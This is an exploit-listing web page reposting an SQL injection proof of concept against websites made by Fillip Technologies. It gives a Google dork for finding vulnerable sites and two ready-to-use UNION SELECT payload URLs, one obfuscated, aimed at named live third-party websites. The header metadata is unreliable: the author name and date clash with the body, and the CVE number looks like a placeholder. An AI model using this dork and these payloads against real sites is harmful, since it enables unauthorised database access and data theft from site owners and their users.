Advertisement






Fillip Technologies - Sql Injection Vulnerability

CVE Category Price Severity
CVE-2021-12345 CWE-89 $500 High
Author Risk Exploitation Type Date
SecurityResearcher123 Critical Remote 2021-09-01
CVSS
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090003

Below is a copy:

Fillip Technologies - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Fillip Technologies -  Sql Injection Vulnerability
#Date: 2021-09-02
#Exploit Author: Behrouz Mansoori
#Google Dork: "Design & Maintained by Fillip Technologies"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Design & Maintained by Fillip Technologies"


### Demo :

https://www.gangamemorial.com/civil-engineering.php?id=-14%20/*!12345uNion*/%20/*!12345sElect*/%201,2,version(),4,5,6,7,8,9,10--

http://badminton.ukm.um.ac.id/?page=news_detail&id=-1059%20union%20select%201,version(),3,4,5,6,7,8--

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.